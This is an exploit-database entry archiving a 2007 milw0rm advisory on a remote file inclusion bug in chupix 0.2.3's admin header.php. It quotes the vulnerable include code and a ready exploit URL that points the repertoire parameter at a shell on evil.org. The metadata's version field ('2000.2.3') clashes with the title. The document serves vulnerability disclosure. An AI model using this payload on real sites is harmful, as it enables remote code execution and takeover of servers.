chupix 0.2.3 /admin/include/header.php RFI

vendor:

chupix

by:

0in

7.5

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: chupix

Affected Version From: 2000.2.3

Affected Version To: 2000.2.3

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

chupix 0.2.3 /admin/include/header.php RFI

The vulnerability allows an attacker to include a remote file from a malicious server, potentially leading to remote code execution.

Mitigation:

To mitigate this vulnerability, the affected application should sanitize user input and avoid including remote files without proper validation.

Source

Exploit-DB raw data:

#chupix 0.2.3 /admin/include/header.php RFI
#f0und by 0in
#contact: 0in.email@gmail.com
#Greetings to:Die-angel,Slim,Joker186,Kaja,Artysta,wojto111,reydex
#team:Our Dark-Coders team;]
--------------------------------------------------------------------------------------------------------------------
#register_globals=On
BUG:
include($repertoire .'db/config/config.php');  // lecture de la configuration souhaitÃ©e par l'utilisateur
 include($repertoire .'include/template.php');             // classe de crÃ©ation des templates
 include($repertoire .'include/MyTxt.php');                // inclusion de la classe MyTxt
 $path_lang = $repertoire ."langues/". $conf__lang ."/admin.php";
 include($path_lang);                                      // Chargement du fichier de langues

EXPLOIT:
http://x.com/[patch]/admin/include/header.php?repertoire=http://evil.org/shell.txt ?
--------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2007-09-27]